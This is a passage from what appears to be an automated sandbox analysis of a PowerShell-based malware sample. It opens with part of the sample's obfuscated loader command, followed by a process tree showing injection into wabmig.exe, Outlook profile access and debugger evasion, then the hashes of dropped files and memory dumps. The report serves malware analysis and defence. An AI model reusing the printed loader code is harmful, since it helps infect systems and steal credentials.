AntiAStrayudiegitSta io NohupUdhngh ForaoTy.nibrknonySon,t ');middelvejen (Forunderlige 'Fibro$GumihgBidralBertioStiftbK.stpaChiasl I.fo:SmokeCryddeiDeserfKinsw Rauri=D.sil Var e[Ud ryS HillyGe,tusSkyputOmstieGlossmPlane.U resCMiltooRe,ienT gngvPort.eEks mrCornitSva p] Enwa: Hiat: rovFLapa.rTilt oReconmhav.gBLivslaDossesTi eteDiapa6 Syst4.rousSMottotUnsher ,idei PalinHvirvgBruge(Musik$Samt BProteaMultigSpradnFid.le T.tt)Bushe ');middelvejen (Forunderlige 'Demon$Sbye gHrde lVirk oTimiabChitcaSal.ilAkkom:PucetB.ransrDigetaCen rnTegnedMiljplPitmaiEthnonDhoongOveri Reku =Myxoc Ko,ku[ scheS,nestyteorisDruestMetd e AflsmAlbi .TeutoTPromeeAntisxOpsertForeh.EubraEDoublnPabulcNaturosamoydsu vei unnnJohangLjerl] heli:Freed:SituaAKolerSUnfreC HaanIherliIAlkoh.BrachGGlatmeProg,t MandS UnfutPanter Stemi umisnHermigCyril(noolo$SalgsCSpeediVldigf Deri)Rengr ');middelvejen (Forunderlige 'Stjed$vivisgPac.alDoxoloRele b Outwa G,mnlFord :G yceg Stylu lsdyn rapnJagtbyRund sNondiaKiwitcStrafkFor ys Meye= bega$D illB.jenerFarvea BolinAadsed SkedlRntgeiIrretnTilvng U sa.Afsens BeekuExtrebUn cesH.emmtHer ar utomi ohlnPur ug Mu.g(Corra$LeddeS BodylRampaa KinsgDiogelPrevietvrb,rturdenBloddeSafinsSerai,Sis u$Rho iMNotabeCorsenKondin VarleDk etsTiltakKasseeSpecil abouiIk esg AgnigUnd,prDosere Maril ndifsKen.eegennes .tte) team ');middelvejen $gunnysacks;"
            4⤵
            • Command and Scripting Interpreter: PowerShell
            • Network Service Discovery
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • Suspicious use of SetThreadContext
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious behavior: MapViewOfSection
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:3436
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Roselite.Gen && echo t"
              5⤵
              • System Location Discovery: System Language Discovery
              PID:4080
            • C:\Program Files (x86)\windows mail\wabmig.exe
              "C:\Program Files (x86)\windows mail\wabmig.exe"
              5⤵
              • Accesses Microsoft Outlook profiles
              • Suspicious use of NtCreateThreadExHideFromDebugger
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • System Location Discovery: System Language Discovery
              • Suspicious use of AdjustPrivilegeToken
              • outlook_office_path
              • outlook_win_path
              PID:4224
    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=4396,i,1602949858158667699,12464335823361976127,262144 --variations-seed-version --mojo-platform-channel-handle=4440 /prefetch:8
      1⤵
        PID:1672

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_qjoplt0t.qmh.ps1
        Filesize

        60B

        MD5

        d17fe0a3f47be24a6453e9ef58c94641

        SHA1

        6ab83620379fc69f80c0242105ddffd7d98d5d9d

        SHA256

        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

        SHA512

        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

        Download Submit

      • C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2170637797-568393320-3232933035-1000\0f5007522459c86e95ffcc62f32308f1_76278eb0-9988-43b4-9423-af5897ebbcb4
        Filesize

        46B

        MD5

        c07225d4e7d01d31042965f048728a0a

        SHA1

        69d70b340fd9f44c89adb9a2278df84faa9906b7

        SHA256

        8c136c7ae08020ad16fd1928e36ad335ddef8b85906d66b712fff049aa57dc9a

        SHA512

        23d3cea738e1abf561320847c39dadc8b5794d7bd8761b0457956f827a17ad2556118b909a3e6929db79980ccf156a6f58ac823cf88329e62417d2807b34b64b

        Download Submit

      • C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2170637797-568393320-3232933035-1000\0f5007522459c86e95ffcc62f32308f1_76278eb0-9988-43b4-9423-af5897ebbcb4
        Filesize

        46B

        MD5

        d898504a722bff1524134c6ab6a5eaa5

        SHA1

        e0fdc90c2ca2a0219c99d2758e68c18875a3e11e

        SHA256

        878f32f76b159494f5a39f9321616c6068cdb82e88df89bcc739bbc1ea78e1f9

        SHA512

        26a4398bffb0c0aef9a6ec53cd3367a2d0abf2f70097f711bbbf1e9e32fd9f1a72121691bb6a39eeb55d596edd527934e541b4defb3b1426b1d1a6429804dc61

        Download Submit

      • C:\Users\Admin\AppData\Roaming\Roselite.Gen
        Filesize

        444KB

        MD5

        c7e82716bf73d35b381ec465cd33c434

        SHA1

        aafcf4ce53ab28b4c345bd88e2076df2624a0cb2

        SHA256

        9469e1ff3febf77c61d8952ef172aff379eb0ec8bbd585fa1a02ef8a6e7bcce1

        SHA512

        673e4006b9d4938b5bb1485ac348e7d5610542852752b515bb1909dab0469b2bf346259cfde165df15f4eac117379c5cec1c1e7e8ca0e1453fee787ebe0cc5aa

        Download Submit

      • memory/2372-7-0x00007FFBBCBA0000-0x00007FFBBD661000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/2372-18-0x00007FFBBCBA3000-0x00007FFBBCBA5000-memory.dmp

        Filesize

        8KB

        Download

      • memory/2372-19-0x00007FFBBCBA0000-0x00007FFBBD661000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/2372-21-0x00007FFBBCBA0000-0x00007FFBBD661000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/2372-16-0x000001B7A2370000-0x000001B7A2392000-memory.dmp

        Filesize

        136KB

        Download

      • memory/2372-4-0x00007FFBBCBA3000-0x00007FFBBCBA5000-memory.dmp

        Filesize

        8KB

        Download

      • memory/2372-24-0x00007FFBBCBA0000-0x00007FFBBD661000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/2372-66-0x00007FFBBCBA0000-0x00007FFBBD661000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/2372-47-0x00007FFBBCBA0000-0x00007FFBBD661000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/2372-5-0x00007FFBBCBA0000-0x00007FFBBD661000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/3436-37-0x0000000005C30000-0x0000000005F84000-memory.dmp

        Filesize

        3.3MB

        Download

      • memory/3436-46-0x0000000008C60000-0x000000000DE68000-memory.dmp

        Filesize

        82.0MB

        Download

      • memory/3436-39-0x0000000006250000-0x000000000629C000-memory.dmp

        Filesize

        304KB

        Download

      • memory/3436-40-0x0000000007A80000-0x00000000080FA000-memory.dmp

        Filesize

        6.5MB

        Download

      • memory/3436-41-0x00000000067C0000-0x00000000067DA000-memory.dmp

        Filesize

        104KB

        Download

      • memory/3436-42-0x00000000074A0000-0x0000000007536000-memory.dmp

        Filesize

        600KB

        Download

      • memory/3436-43-0x0000000007440000-0x0000000007462000-memory.dmp

        Filesize

        136KB

        Download

      • memory/3436-44-0x00000000086B0000-0x0000000008C54000-memory.dmp

        Filesize

        5.6MB

        Download

      • memory/3436-27-0x0000000005B00000-0x0000000005B66000-memory.dmp

        Filesize

        408KB

        Download

      • memory/3436-38-0x0000000006220000-0x000000000623E000-memory.dmp

        Filesize

        120KB

        Download

      • memory/3436-26-0x0000000005A20000-0x0000000005A86000-memory.dmp

        Filesize

        408KB

        Download

      • memory/3436-22-0x0000000004D80000-0x0000000004DB6000-memory.dmp

        Filesize

        216KB

        Download

      • memory/3436-23-0x00000000053F0000-0x0000000005A18000-memory.dmp

        Filesize

        6.2MB

        Download

      • memory/3436-25-0x0000000005340000-0x0000000005362000-memory.dmp

        Filesize

        136KB

        Download

      • memory/4224-63-0x0000000001000000-0x0000000006208000-memory.dmp

        Filesize

        82.0MB

        Download

      • memory/4224-62-0x0000000000400000-0x00000000005E4000-memory.dmp

        Filesize

        1.9MB

        Download

      • memory/4224-48-0x0000000001000000-0x0000000006208000-memory.dmp

        Filesize

        82.0MB

        Download